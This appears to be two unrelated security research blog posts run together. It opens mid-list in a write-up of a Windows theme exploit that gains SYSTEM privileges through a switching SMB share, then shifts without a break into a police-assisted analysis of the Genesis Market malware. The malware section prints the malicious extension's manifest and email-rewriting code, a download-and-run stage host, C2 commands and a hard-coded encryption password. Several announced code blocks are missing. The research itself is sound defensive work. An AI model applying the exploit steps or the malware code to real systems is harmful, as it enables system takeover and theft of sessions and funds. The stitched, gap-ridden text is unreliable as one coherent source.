6. If all goes well, then our payload is now executing inside winlogon.exe, which is running as NT AUTHORITY\SYSTEM.
7. Otherwise, repeat steps (3) to (5).
Winning ^W Avoiding the race
While it may be fun to exploit race conditions, it's even better if there is no need to race at all. Since an attacker has full control of the theme's visual styles DLL path, there is no need to race. All they would have to do is specify a UNC path pointing to a file on a remote SMB share that is under their control. Doing so would allow them to control exactly which version of the _vrf.dll is returned for which file read operation.
The only requirement is that the share at the other end is set up to host a properly signed .msstyles file and returns a validly signed _vrf.dll file on the first read and a malicious _vrf.dll file the second time.
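The idea of a share that answers differently per read can be modelled as follows. `SwitchingShare` and `verify_then_load` are hypothetical names and the path is a placeholder; a real SMB exchange involves many more operations per file open than the single `read` call used here.

```python
class SwitchingShare:
    """Toy file server that answers the first read differently from later ones."""

    def __init__(self, first, later):
        self.first = first
        self.later = later
        self.reads = 0

    def read(self, path):
        self.reads += 1
        return self.first if self.reads == 1 else self.later


def verify_then_load(share, path, is_signed):
    if not is_signed(share.read(path)):  # read 1: signature verification
        return None
    return share.read(path)              # read 2: the actual load


SIGNED, MALICIOUS = b"signed", b"malicious"
share = SwitchingShare(first=SIGNED, later=MALICIOUS)
loaded = verify_then_load(
    share,
    r"\\host\share\file.msstyles_vrf.dll",  # placeholder UNC path
    lambda data: data == SIGNED,            # stand-in for signature checking
)
```

Because the server decides what each read returns, the outcome is deterministic: no timing window has to be hit.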
Triggering the vulnerable code path
As previously mentioned, Winlogon is responsible for creating the user's desktop upon user logon. So it stands to reason that logging out then back in again should trigger the vulnerable code path. And indeed, that does cause a theme reload and combined with a visual styles file path pointing to a remote SMB share, we're guaranteed to exploit the vulnerability successfully in one shot. However, it seemed a bit complicated so we set out to find another way.
We ended up finding out that changing the UI's scaling to a value > 100% triggers a theme reload at least once, although this was a bit flaky in our tests. Since racing is no longer needed, that does not matter: a single theme reload is sufficient to exploit the vulnerability. On the upside, changing the UI's scaling can easily be done with some PowerShell.
Modifying the exploit template from earlier, a reliable exploit could look like this:
1. Prepare a .msstyles file with a PACKTHEM_VERSION of 999 and store it on an attacker-controlled SMB share at \\<share host>\path\to\file.msstyles.
2. Change the registry key HKCU\Software\Microsoft\Windows\CurrentVersion\ThemeManager\DllName to point to \\<share host>\path\to\file.msstyles.
3. Put a validly signed .msstyles file at \\<share host>\path\to\file.msstyles_vrf.dll.
4. Trigger a theme re-load by setting the UI scaling to some value > 100%.
5. Wait until the file at \\<share host>\path\to\file.msstyles_vrf.dll is read once.
6. Replace the file \\<share host>\path\to\file.msstyles_vrf.dll with a malicious version.
7. When the file is requested for the second time by LoadLibraryW, it's presented instead with the malicious version, thereby achieving code execution inside winlogon.exe.
For our exploit, we set up a remote host that is running a samba share and a scapy-based Python script to perform the file replacement step. The script detects when the first read operation has been sent over the wire, after which it replaces the validly signed file.msstyles_vrf.dll on disk with our malicious DLL.
Demo
The demo video shows the exploit in action. We start with a standard authenticated user, lowuser, then run the exploit script. It sets the user's visual styles DLL key described above to \\192.168.64.1\public\asdf.msstyles. Afterwards, it changes the UI's scaling to 150%, causing winlogon.exe to reload the user's theme. Once the .msstyles file is loaded and its PACKTHEM_VERSION resource is checked, winlogon.exe verifies the signature of \\192.168.64.1\public\asdf.msstyles_vrf.dll. This signature verification step passes since the first file presented by the SMB share is correctly signed. Afterwards, winlogon.exe loads the DLL one more time at which point our Python script has replaced it with an unsigned malicious DLL. The result can be seen as the malicious DLL spawns an interactive command prompt as NT AUTHORITY\SYSTEM.
Fix analysis
Microsoft's patch updated the code for LoadThemeLibrary in both uxtheme.dll and UXInit.dll to remove the PACKTHEM_VERSION check and the ReviseVersionIfNecessary function entirely. Hence, the initially vulnerable code path no longer loads any DLLs in that path besides the LOAD_LIBRARY_AS_DATAFILE loading of the .msstyles PE.
On the other hand, the fix did not address how visual styles signatures are validated. The responsible code is still vulnerable to a TOCTOU vulnerability, so it may be possible for attackers to exploit any processing bugs that occur after signature validation.
Detection
Since the fix removes the "visual style version verification" functionality entirely, it seems safe to assume that Microsoft has deemed it unnecessary. Therefore, any attempt to load a DLL whose path ends in .msstyles_vrf.dll is likely a CVE-2023-38146 exploit attempt.
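The detection rule above can be sketched as a small path check. This is only an illustration of the matching logic: the function name is hypothetical, and how module-load events are collected (EDR telemetry, Sysmon image-load events, etc.) is left out and would depend on your tooling.

```python
SUSPICIOUS_SUFFIX = ".msstyles_vrf.dll"


def is_suspicious_theme_dll(path: str) -> bool:
    """Return True if a loaded module path ends in .msstyles_vrf.dll.

    Windows paths are case-insensitive, so the comparison is done in lowercase.
    """
    return path.strip().lower().endswith(SUSPICIOUS_SUFFIX)


if __name__ == "__main__":
    for candidate in (
        r"\\192.168.64.1\public\asdf.msstyles_vrf.dll",
        r"C:\Windows\Resources\Themes\aero\aero.msstyles",
    ):
        print(candidate, is_suspicious_theme_dll(candidate))
```

Matching on the suffix rather than on a specific share or file name keeps the check independent of the attacker-chosen path.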
For the last couple of weeks we've assisted the Dutch police in investigating the Genesis Market. In case you are unfamiliar with this market, it was used to sell stolen login credentials, browser cookies and online fingerprints (in order to prevent "risky sign-in" detections), referred to by some as IMPaaS, or Impersonation-as-a-Service. The market seems to have started in 2018 and its activities have resulted in approximately two million victims. If you want to know more about this operation, you can read our other blog post. You can also check if your data has been compromised by the market operators via the website of the Dutch police.
In order to operate this market, victims were infected with malware that would steal all data from their browser. The malware was persistent, so that any new information added to the browser later could be stolen as well. Buyers would receive access to a custom Chromium build or browser extension which could load the stolen information of a victim.
We helped the police by analysing the malware that got installed by its victims and by analysing the browser that would be accessible for buyers. The focus was to determine the infection chain of the victim. Additionally, we looked at the browser available to buyers, to see if this would give new insights about the methods used by the market or the buyers. The victim in this case got infected in the second half of February.
Due to the short timespan in which this research had to be conducted, it is possible that some details are missing or not 100% accurate. We've been careful to mention any uncertainties in this article. This article should however give some more insight into how this market operated and can hopefully give future researchers a head start if this market ever re-launches. In addition, it highlights a trend of attackers switching from stealing credentials to stealing session cookies, to cope with the increased adoption of multi-factor and risk-based authentication.
This analysis starts with a write-up of the infection chain and an analysis of the malware that gets dropped. In the second half we dig deeper into the buyers' browser extension and how it can be fingerprinted. In case you are interested, Trellix also has a writeup of the exploit chain of one of the other victims.
The infection
Stage one: the loader
The infection we investigated started (ironically) because the victim wanted to activate his or her anti-virus product. Rather than paying for a subscription, the victim downloaded an illegal activation crack. This ended up uninstalling the original AV product and installing malware instead...
The activation crack came as an executable, setup.exe, packed in a ZIP file. Looking at the creation date, it seems like the file was created the day before, possibly to bypass any new AV detection rules. The file is 444 MB in size, but the last 439 MB are all set to 0.
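The zero padding is easy to measure when triaging a similar sample. The helper below is a minimal sketch (the function name and chunk size are our own choices, not part of any tool used in the investigation) that counts the run of 0x00 bytes at the end of a file without loading it into memory.

```python
import os


def trailing_zero_bytes(path, chunk_size=1 << 20):
    """Count the consecutive 0x00 bytes at the end of the file at `path`."""
    count = 0
    pos = os.path.getsize(path)
    with open(path, "rb") as fh:
        # Walk backwards through the file one chunk at a time.
        while pos > 0:
            read_len = min(chunk_size, pos)
            pos -= read_len
            fh.seek(pos)
            chunk = fh.read(read_len)
            stripped = chunk.rstrip(b"\x00")
            count += len(chunk) - len(stripped)
            if stripped:
                # A non-zero byte was found, so the padding run ends here.
                break
    return count
```

Comparing the returned value with the total file size shows how much of the file is padding.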
Upon further investigation, setup.exe seemed to be an Inno Setup-generated installer, with the packaged data being the malicious payload. Luckily, we could quickly test this hypothesis and make use of a wide array of tools to investigate the installer package further:
$ cd extracted && file tmp/*
isgoisegjoqwg.dll: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 1920x1080, components 3
jcoigasjioqeg.dll: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS6 (Windows), datetime=2023:02:09 01:02:17], progressive, precision 8, 3840x2160, components 3
yvibiajwi.dll: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
The two images seem unrelated to the actual malware. They are a picture of a pride flag and a picture of LeBron James.
yvibiajwi.dll stood out because there were multiple identical copies of that DLL in the directories created by setup.exe on the victim's machine, but no copies of the other two files.
Additionally, the second stage executable setup.tmp loads yvibiajwi.dll at some point. More specifically, the following high level sequence of actions takes place:
setup.exe creates a new directory, referred to as the setup temp directory from here on, with the format is-<5 uppercase random alphanumeric>.tmp in the directory retrieved by GetTempPath()
setup.exe writes another executable, setup.tmp to the setup temp directory
setup.exe launches setup.tmp with the command line argument /SL5="$B0638,3246841,963072,<path to setup.exe>"
setup.tmp opens the setup.exe file, reads data from it and writes yvibiajwi.dll to the setup temp directory
setup.tmp launches setup.exe with the command line argument /VERYSILENT
setup.exe creates a new setup temp directory and writes setup.tmp to the new directory then launches it with a similar /SL5 command line argument
setup.tmp reads yvibiajwi.dll from the packaged data in setup.exe and writes it to the most recently created setup temp directory
setup.tmp loads yvibiajwi.dll
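When looking for traces of this flow on a machine, the directory naming scheme described above can be matched with a regular expression. The sketch below is illustrative: the helper names are ours, and the DLL name is specific to this sample. The directory pattern alone is not an indicator, since it likely matches directories left by legitimate installers as well, which is why the helper also requires the dropped DLL to be present.

```python
import re
from pathlib import Path

# "is-" + five uppercase alphanumeric characters + ".tmp", as described above.
SETUP_TEMP_DIR = re.compile(r"is-[A-Z0-9]{5}\.tmp")


def is_setup_temp_dir(name: str) -> bool:
    """Check whether a directory name follows the setup temp directory format."""
    return SETUP_TEMP_DIR.fullmatch(name) is not None


def find_dropped_dll_dirs(temp_root, dll_name="yvibiajwi.dll"):
    """List setup temp directories under temp_root that contain the dropped DLL."""
    hits = []
    for entry in Path(temp_root).iterdir():
        if entry.is_dir() and is_setup_temp_dir(entry.name) and (entry / dll_name).is_file():
            hits.append(entry)
    return sorted(hits)
```

Pointing find_dropped_dll_dirs at the user's temporary directory would list the directories where the installer left a copy of the DLL.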
The second invocation with /VERYSILENT hides all of the installer's windows, per Inno Setup's documentation. Keeping Inno Setup's intended purpose in mind, the above flow seems unusual. It would likely not be standard functionality unless extra code is embedded in the generated installer. So, is there?
Embedded PascalScript
Inno Setup supports adding specialized tasks to a generated installer beyond simply unpacking the contents. An installer script can define user-selectable tasks in the [Tasks] section, or programs to execute in the [Run] section. Additionally, an installer script can specify custom code in PascalScript to customize the (un-)installation process. setup.exe also includes an embedded compiled script which defines a function to be called on setup initialization. Using innounp and IFPSTools.NET, the embedded PascalScript can be unpacked and decompiled for analysis:
The functionality implemented by the above script seems to match up with the observed behavior. When the installer process executes it in "SILENT" mode, it also invokes a function called RedrawElipse in yvibiajwi.dll, which kicks off the next stage of the infection chain.
Diving into yvibiajwi.dll
The DLL seems to be written in C++. Upon loading this DLL in IDA, we're finally met with our first taste of control flow obfuscation in the infection chain so far:
The obfuscation techniques applied are limited to runs of bogus Windows/libc API calls that are guarded by an always false if condition or empty loops, so it's relatively simple to ignore them:
With the control flow cleaned up a bit, we can finally tell that the DLL is another dropper which loads a piece of shellcode and executes it. However, execution of the shellcode is not done on DLL loading in DllMain, instead DllMain only sets up a few pointers and allocates memory for the shellcode and nothing else. In order to execute the embedded shellcode, the exported RedrawElipse function has to be called with the first argument set to 0x77A76 or 490102. Of course, this is exactly how the function is invoked in the embedded PascalScript in setup.exe:
Once invoked, RedrawElipse eventually calls crypt32.dll!CryptStringToBinaryA to decode the embedded base64 shellcode block. It then decrypts the decoded block using what seems to be a custom 64-bit block cipher with a hardcoded key then executes the decrypted shellcode.
The shellcode then decrypts an embedded loader executable using the eXtended Tiny Encryption Algorithm (XTEA) block cipher and uses process hollowing to inject it into a newly spawned explorer.exe process. Afterwards, the injected loader downloads a file from http://194.135.33[.]96/rozemarin.exe, which gets renamed to svchost.exe and executed. It also executes a PowerShell script which downloads some more resources. Both are described in more detail hereafter.
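For readers unfamiliar with XTEA, the sketch below shows the standard algorithm on a single 64-bit block. It is not lifted from the shellcode: the round count (32), the little-endian word order and the block-by-block (ECB-style) processing are assumptions on our part, and the mode and key handling used by the actual sample may differ.

```python
import struct

DELTA = 0x9E3779B9
MASK = 0xFFFFFFFF


def xtea_encrypt_block(block: bytes, key: bytes, rounds: int = 32) -> bytes:
    """Encrypt one 8-byte block with a 16-byte key (little-endian words assumed)."""
    v0, v1 = struct.unpack("<2I", block)
    k = struct.unpack("<4I", key)
    total = 0
    for _ in range(rounds):
        v0 = (v0 + ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (total + k[total & 3]))) & MASK
        total = (total + DELTA) & MASK
        v1 = (v1 + ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (total + k[(total >> 11) & 3]))) & MASK
    return struct.pack("<2I", v0, v1)


def xtea_decrypt_block(block: bytes, key: bytes, rounds: int = 32) -> bytes:
    """Decrypt one 8-byte block by running the rounds in reverse order."""
    v0, v1 = struct.unpack("<2I", block)
    k = struct.unpack("<4I", key)
    total = (DELTA * rounds) & MASK
    for _ in range(rounds):
        v1 = (v1 - ((((v0 << 4) ^ (v0 >> 5)) + v0) ^ (total + k[(total >> 11) & 3]))) & MASK
        total = (total - DELTA) & MASK
        v0 = (v0 - ((((v1 << 4) ^ (v1 >> 5)) + v1) ^ (total + k[total & 3]))) & MASK
    return struct.pack("<2I", v0, v1)


def xtea_decrypt(data: bytes, key: bytes) -> bytes:
    """Decrypt a buffer block by block; len(data) must be a multiple of 8."""
    return b"".join(xtea_decrypt_block(data[i:i + 8], key) for i in range(0, len(data), 8))
```

The constant 0x9E3779B9 is a convenient signature to search for when trying to recognise TEA-family ciphers in a disassembly.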
Taking a closer look at svchost.exe
All of the stages prior to the one that loaded this executable involved dropping a static next stage in some shape or form. However, this executable was downloaded and is therefore one of the first elements of the infection chain that might differ from one campaign to the next. Case in point: after extracting the previous stage's executable, we found a matching submission (by hash) on VirusTotal. Linked to that VirusTotal submission is a VMRay analysis report, which shows a different hash for svchost.exe than the one we acquired from the victim's filesystem.
Focusing on this svchost.exe version: it sets off another series of nested encrypted shellcode stages. The first stage is decrypted and executed, which sets up and executes the second stage and so on. Each stage is encrypted differently from its successor:
The second stage is encrypted using a custom cipher.
The third and final stage is an executable that is embedded in plaintext in the second stage.
Interestingly, the final stage is executed through "self PE injection". This is achieved by having the second stage shellcode replace the PE of its own process, namely the svchost.exe executable, with the embedded final stage's PE. Afterwards, relocations are updated to match those of the final stage PE, and the second stage shellcode jumps to the now-mapped final stage executable's entry point.
While analyzing the final executable, we noticed that there is quite some similarity between it and a DLL found on the victim's machine which matched the Danabot malware. This makes sense, as we learned that the Genesis Market relied on multiple known botnets in the past. AZORult, GoodKit and Arkei also seem linked to prior infections. The reason we suspected Danabot is that both pieces of code are written in Delphi and are heavily obfuscated using almost identical techniques. We were able to find a much stronger link when analysing the chain starting from svchost.exe dynamically:
The screenshot above shows that at some point, svchost.exe writes the malicious Qruhaepdediwhf.dll DLL to the user's %TMP% directory and loads it using rundll32.exe. Shortly after doing so, svchost.exe's process exits while the rundll32.exe process that loaded the malicious DLL continues. Furthermore, we found that the Qruhaepdediwhf.dll file from the victim's device and the one dropped in the analysis detonation run are almost identical except for what seems to be a randomly generated hex-encoded identifier at offset 0x0050695C (exact identifiers modified):
At this stage, we stopped analysing the infection chain further since the links between the artefacts on the victim's device and the suspected initial infection vector have been sufficiently clarified. The remainder of this document focuses on the parts of the malware that are more strongly related to the market's illicit activities.
Downloading remote resources
As mentioned earlier, the final loader executable that is executed by the decoded shellcode in yvibiajwi.dll not only drops svchost.exe, but also runs the following PowerShell command:
This downloads a new PowerShell command from the remote host tchk-1[.]com, which gets executed. Further analysis of this host revealed that it is just a proxy (using HAProxy), forwarding requests to other hosts.
Besides v3.bs64 there seem to be other versions as well, such as 5.ps1. In general, the script seems to either contain the encoded files inline or download them separately. These files constitute an unpacked browser extension, which (in the case of our victim) gets saved in $localAppData\Default. Then the script iterates over all start menu items, looking for shortcuts to browsers based on Chromium, such as Google Chrome and Brave. It modifies these shortcuts by appending --load-extension=<extension path> to each shortcut such that the just dropped extension gets loaded.
Below you can find the decoded version of v3.bs64, though encoded data has been removed for readability:
We believe the extension that gets dropped and loaded into Chrome is directly related to the market. It poses as Google Drive, as can be seen in its manifest.json:
{"offline_enabled":true,"name":"Google Drive","author":"Google inc.","description":"Google Drive: create, share and keep all your stuff in one place.","version":"1.8.7","icons":{"128":"ico.png"},"permissions":["scripting","webNavigation","system.cpu","system.display","system.storage","system.memory","management","storage","cookies","notifications","tabs","history","webRequest","declarativeNetRequest","alarms"],"manifest_version":3,"background":{"service_worker":"./src/background.js","type":"module"},"host_permissions":["<all_urls>"],"content_scripts":[{"matches":["<all_urls>"],"all_frames":true,"js":["src/content/main.js","src/mails/gmail.js","src/mails/hotmail.js","src/mails/yahoo.js"],"run_at":"document_start"}],"declarative_net_request":{"rule_resources":[{"id":"disable-csp","enabled":false,"path":"rules.json"}]}}
It injects several content scripts and it declares some rewrite rules that disable the Content Security Policy. The extension itself consists of multiple JavaScript files, which no effort was made to obfuscate. Let's take a closer look at its features. Below you can see a file listing of the extension, which already paints a picture of what to expect:
In a later version of the extension we analysed, this reference was removed.
Command and Control
The first thing we noticed was how it determines its C2 server. For this it relied on monitoring outgoing transactions from a single Bitcoin address (bc1qtms60m4fxhp5v229kfxwd3xruu48c4a0tqwafu), using the JSON API of blockchain.info. This address has made a single transaction, to a legacy Bitcoin address 1C56HRwPBaatfeUPEYZUCH4h53CoDczGyF. This address can be Base58 decoded, resulting in the domain you-rabbit[.]com. This host is then contacted as the C2 server.
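The decoding step can be sketched as follows. This is our own illustration, not the extension's code: it assumes the usual legacy address layout (one version byte, a 20-byte payload and a 4-byte double-SHA256 checksum) and assumes that the domain is stored as ASCII in the payload, padded with zero bytes. The function names are hypothetical.

```python
import hashlib

# Bitcoin's Base58 alphabet (no 0, O, I or l).
ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def b58decode(text: str) -> bytes:
    """Decode a Base58 string into raw bytes."""
    num = 0
    for ch in text:
        num = num * 58 + ALPHABET.index(ch)
    body = num.to_bytes((num.bit_length() + 7) // 8, "big")
    # Every leading '1' character encodes one leading zero byte.
    pad = len(text) - len(text.lstrip("1"))
    return b"\x00" * pad + body


def decode_legacy_address(address: str):
    """Return (version byte, payload) after verifying the 4-byte checksum."""
    raw = b58decode(address)
    data, checksum = raw[:-4], raw[-4:]
    expected = hashlib.sha256(hashlib.sha256(data).digest()).digest()[:4]
    if checksum != expected:
        raise ValueError("Base58Check checksum mismatch")
    return data[0], data[1:]


def payload_to_text(payload: bytes) -> str:
    """Interpret the payload as zero-padded ASCII (an assumption, see above)."""
    return payload.rstrip(b"\x00").decode("ascii", errors="replace")
```

Calling payload_to_text(decode_legacy_address(address)[1]) on the receiving address of the transaction gives a string that can be compared with the C2 domain named above.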
Since this transaction took place on February 6th 2023, prior infections must have used either a different technique, or relied on a different Bitcoin address to determine its C2 host. For this we downloaded a copy of the Bitcoin transaction database from January and decoded all legacy addresses to see if we could find any similar addresses, but this did not result in any matches. This could indicate that this was a new technique they just adopted in the last few months.
Oh no! There is something wrong with my Bitcoin wallet
One of the things the extension monitors for is emails you might receive from various crypto exchanges. If it finds one, it rewrites the email to make it look less suspicious. For example, changing an email about a withdrawal into an email about a new sign-in:
if (window.location.href.indexOf('mail.google') > -1) {
    const binance = () => {
        let items = $(document).find(':contains("Withdrawal Requested")').filter(function () {
            return $(this).children().length === 0;
        })
        for (const item of items) {
            $(item).text(`[Binance] Authorize New Device`)
        }
        items = $(document).find('span:contains("Memo:")')
        for (const item of items) {
            $(item).html(`<span class="Zt"> - </span>Authorize New Device You recently attempted to sign in to your Binance account from a new device or location. As a security measure, we require additional confi.`)
        }
        items = $($(document).find('div:contains("Memo:")').filter(function () {
            return $(this).children().length === 0;
        })[0]).parents('.ii')
        for (const item of items) {
            const code = $($(item).find('div[style*="font-size:20px"]')[1]).find('div').text()
            $(item).html('...')
        }
    }
    ...
}
They have support for Gmail, Hotmail/Outlook and Yahoo and seem to monitor emails from Binance, Bybit, Huobi, Okx, Kraken, KuCoin and Bittrex.
Since they don't actually check the domain name, but rather whether e.g. "mail.google" is present somewhere in the URL, we can use this to detect if a user is infected with this extension:
<script type="text/javascript">
if (window.location.href.indexOf("mail.google+outlook.live+yahoo") === -1) {
    window.location.href = window.location.href + "#scan=mail.google+outlook.live+yahoo";
}
setTimeout(function analyze() {
    var checks = [];
    // The + is needed to avoid this element itself being modified!
    checks.push(document.getElementById("binance").innerText !== "Withdrawal " + "Requested");
    checks.push(document.getElementById("huobi").innerText !== "Подтвердите " + "запрос на вывод средств");
    checks.push(document.getElementById("okx").innerText !== "Verification " + "Code Of Withdrawal");
    checks.push(document.getElementById("kraken").innerText !== "Confirm " + "your new withdrawal address");
    checks.push(document.getElementById("kucoin").innerText !== "KuCoin " + "Verification Code");
    checks.push(document.getElementById("bitget").innerText !== "Add " + "withdrawal address");
    checks.push(document.getElementById("bittrex").innerText !== "Please " + "Confirm Your Withdrawal");
    var found = 0;
    for (i in checks) {
        if (checks[i]) found += 1;
    }
    if (found === 0) {
        document.getElementById('result').innerText = "Good news! The malicious browser extension was not detected.";
    } else {
        document.getElementById('result').innerHTML = "Bad news! We also detected this extension on your system. We would advice you to go to the website of the <a href='https://politie.nl/checkyourhack'>Dutch police</a>, where they can assist you further.";
    }
}, 2000)
</script>
<p style="display: none;" id="binance">Withdrawal Requested</p>
<p style="display: none;" id="huobi">Подтвердите запрос на вывод средств</p>
<p style="display: none;" id="okx">Verification Code Of Withdrawal</p>
<p style="display: none;" id="kraken">Confirm your new withdrawal address</p>
<p style="display: none;" id="kucoin">KuCoin Verification Code</p>
<span style="display: none;" id="bitget">Add withdrawal address</span>
<p style="display: none;" id="bittrex">Please Confirm Your Withdrawal</p>
<div id="result">Checks still running...</div>
This script is embedded on this page, and the result is:
Deputizing the victim's browser - request proxying
Another interesting feature of the malicious browser extension is the ability to proxy HTTP requests through the victim's browser. This feature can be enabled at any time by the C2 server using the aptly-named proxy command (more on the other supported commands later). In addition, the feature can also be enabled during registration with the C2 server if isEnabledProxy is set to true in the JSON-formatted response of the registration endpoint at https://{c2.domain}/api/machine/init.
When enabled, the proxy feature attempts to set up a WebSocket connection channel to another C2 server which is relayed by the main C2 server in the response to https://{c2.domain}/api/machine/settings on port 4343. Once set up, the proxy submodule will wait for commands from its associated C2 server, which can be one of:
HTTP_REQUEST request a URL through the victim's browser, adding the victim's own cookies using the fetch() API
AUTH provide the uuid of the malicious extension's instance
GET_COOKIES get a copy of all the cookies
Requests made by the C2 server through the HTTP_REQUEST command occur within the context of the extension, making them invisible to victims. We were able to test this specific subset of the functionality by creating our own set of emulated C2 servers, so we could see the proxy functionality in action asking the extension to make a request to http://localhost:8080/test2:
As a result, the extension indeed issued a request to http://localhost:8080/test2:
Despite the existence of this proxy feature, its intended use case remains a mystery to us. From the point of view of features available to market users, the buyers' extension, which is discussed in more detail later in this writeup, makes no reference to this feature. There is the possibility to set a SOCKS5 proxy in the extension settings page, but that does not seem related to the malicious extension's proxy feature. Additionally, the user manual only mentions the SOCKS5 proxy feature.
It may be the case that proxying through the victim's machine is possible for bot buyers, perhaps through a SOCKS5 interface exposed by the Danabot-like malware that's deployed as part of the infection chain. However, we do not have enough information to draw any definitive conclusions on whether these features are available to buyers or not.
Other functionality
Besides rewriting emails and proxying requests, the C2 server can send the following commands to the victim:
extension enable or disable a certain browser extension
info get information about the victim's machine (e.g. WebGL machine details)
push send a push notification
cookies get a copy of all cookies
screenshot send back a screenshot of the page currently open in the browser
url open a URL in the browser
current_url send back the URL of the current tab
history send back the browser history
injects download a new set of rules from the server, which specify extra JavaScript to execute on certain domains
settings get a new settings object from the server; for example links it should grab
Analysis of the browser (extension) for buyers
Buyers on the market get access to a Chromium extension (as .crx file) and a browser (based on ungoogled-chromium) with the extension preinstalled. This extension can easily import bought fingerprints and cookies.
General functionality
The extension, once activated, allows buyers to automatically import bought fingerprints and cookies. Furthermore, it allows for the setup of a SOCKS5-based proxy. The plugin can be seen in action in the GIF below.
Analyzing the source code
This extension is heavily obfuscated, making it difficult to determine exactly how it works and what features it offers. We combined the analysis of the source code with dynamic analysis in an isolated VM.
The extension requires a large list of permissions, for example, allowing it full access to all visited pages. The full list of permissions is:
This list contains a number of permissions for which it is not clear what functionality they are intended for, such as desktopCapture, system.cpu and power.
When the extension is installed, users need to activate it using an "activation code". When a code is entered, the browser sends a POST request to the following URL:
https://sync.approveconnects[.]com/security
If this request fails, it tries again with the following URL:
https://sync.gsconnects[.]com/security
This request contains a multipart body with 3 variables: a, v and i. Each field is encrypted and is included as binary data in the multipart body. The encryption of the activation key (the field a) works as follows:
The activation key is encoded as a JSON string (enclosed in double quotes).
This string is URL-encoded (replacing the double quotes with %22, etc.).
This result is then compressed using deflate (the compression algorithm used by zlib, but without a zlib header).
Then, a key and IV are generated. This uses the OpenSSL EVP_BytesToKey KDF with a random 8-character salt and the hard-coded password liauyd(o*!&@#ijKj@!#asdg2134.
The compressed data is encrypted using AES-CBC with the generated key and IV and with PKCS7 padding.
The data submitted in the request is the random salt followed by the cipher text.
The parameters v and i are encrypted in a similar way, but with a different password. The password is generated by taking the activation key, swapping the case of all letters (replacing lowercase characters with uppercase characters and vice versa) and appending the string asdg2134.
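The steps above can be sketched with the Python standard library, up to (but not including) the AES-CBC step, which needs a third-party library. Several details here are assumptions rather than findings: the digest (MD5), single iteration and 256-bit key size follow the defaults of OpenSSL-compatible implementations and were not confirmed for the extension, urllib's quote only approximates JavaScript's URL encoding, the salt is drawn as 8 random bytes, and all function names are ours.

```python
import hashlib
import json
import os
import zlib
from urllib.parse import quote

STATIC_PASSWORD = b"liauyd(o*!&@#ijKj@!#asdg2134"  # hard-coded password for field a


def evp_bytes_to_key(password: bytes, salt: bytes, key_len: int = 32, iv_len: int = 16):
    """OpenSSL EVP_BytesToKey with MD5 and one iteration (assumed parameters)."""
    derived = b""
    block = b""
    while len(derived) < key_len + iv_len:
        block = hashlib.md5(block + password + salt).digest()
        derived += block
    return derived[:key_len], derived[key_len:key_len + iv_len]


def prepare_plaintext(value) -> bytes:
    """JSON-encode, URL-encode and raw-deflate a value (no zlib header)."""
    encoded = quote(json.dumps(value), safe="")
    compressor = zlib.compressobj(wbits=-15)  # negative wbits selects raw deflate
    return compressor.compress(encoded.encode("ascii")) + compressor.flush()


def pkcs7_pad(data: bytes, block_size: int = 16) -> bytes:
    """Pad to a whole number of blocks, as required before AES-CBC."""
    pad_len = block_size - len(data) % block_size
    return data + bytes([pad_len]) * pad_len


def field_password(activation_key: str) -> bytes:
    """Password for the v and i fields: case-swapped activation key + 'asdg2134'."""
    return (activation_key.swapcase() + "asdg2134").encode()


def derive_for_field_a(activation_key: str):
    """Return (salt, key, iv, padded plaintext) ready for an AES-CBC encryptor."""
    salt = os.urandom(8)
    key, iv = evp_bytes_to_key(STATIC_PASSWORD, salt)
    return salt, key, iv, pkcs7_pad(prepare_plaintext(activation_key))
```

Feeding the key, IV and padded plaintext into any AES-CBC implementation and prefixing the ciphertext with the salt would then produce the request field as described.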
The parameter v contains the version number of the plugin (currently 7.2), as a JSON dictionary:
{"v":"7.2"}
The parameter i contains certain fingerprinting data of the browser and extension, such as the user agent, OS details and a list of the removable drives on the user's machine. We don't see any way this could be relevant for the extension, so this is likely just included to monitor and track the buyers:
{"p":{"p":{"a":"aarch64","b":"","c":"","d":6},"m":{"a":4113801216},"s":{"a":{"c":[],"a":["536870912|777db833-9d2e-40e5-a1cb-75b26827b847|/boot/efi|/boot/efi","1048576|7ff0d82f-ee43-4c1d-85a4-a5af0aa1aab5|/media/user/6c781ebb-c8e1-430b-84ae-1bc1ff6891ee|/media/user/6c781ebb-c8e1-430b-84ae-1bc1ff6891ee","32797360128|0f25215a-4b5c-4569-ab5a-552bc703bd94|/|/"],"b":[]}},"i":{"a":{"c":[],"a":["536870912|777db833-9d2e-40e5-a1cb-75b26827b847|/boot/efi|/boot/efi","1048576|7ff0d82f-ee43-4c1d-85a4-a5af0aa1aab5|/media/user/6c781ebb-c8e1-430b-84ae-1bc1ff6891ee|/media/user/6c781ebb-c8e1-430b-84ae-1bc1ff6891ee","32797360128|0f25215a-4b5c-4569-ab5a-552bc703bd94|/|/"],"b":[]}}},"j":{"c":"9a3bd3e8cebf17110f689f58a4a1f43e","w":"6c14da109e294d1e8155be8aa4b1ce8e","s":"Chrome 111","p":{"ua":"Mozilla/5.0 (X11; Linux aarch64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36","browser":{"name":"Chrome","version":"111.0.0.0","major":"111"},"engine":{"version":"537.36","name":"WebKit"},"os":{"name":"Linux","version":"aarch64"},"device":{},"cpu":{}},"a":"ad449aba7595468941c6d3b6aad54a4fc76797aa","t":{"s":0,"b":1}}}
The server can reverse this process by first decrypting the activation code, generating the same key and IV using the salt. Then the activation code can be used to decrypt the v and i fields.
Jumping through all these hoops does give us an "activated" extension:
At regular intervals, the extension will submit its activation code again (specified by renew_interval/renew_enabled). This request contains the same variables as the first activation request with 3 additional fields: b, e and d. The exact meaning of these fields has not yet been determined.
While the code is obfuscated, the settings reveal some of its functionality. We managed to obtain the following configuration object from the extension:
The URL for the activation is constructed by taking a value from the links_domain_sync and appending the link_path_sync path.
Note that this extension had just been installed and not activated, so the values when in use will be different. It looks likely that the link_path_bots endpoint is used to automatically retrieve the list of cookies and online fingerprints that the buyer has bought. The proxy and selected_fp fields would be filled with settings if the extension was in use.
The configuration can also be obtained from disk from files at the following path:
This is a LevelDB database, which appears to also keep a number of older versions of the configuration.
